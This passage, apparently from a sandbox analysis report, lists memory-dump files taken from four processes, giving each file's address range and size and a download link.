memory/292-81-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-77-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-38-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-72-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/292-36-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/292-75-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1248-61-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1248-58-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1248-55-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1728-64-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1728-65-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1728-63-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1836-59-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1836-60-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1836-57-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download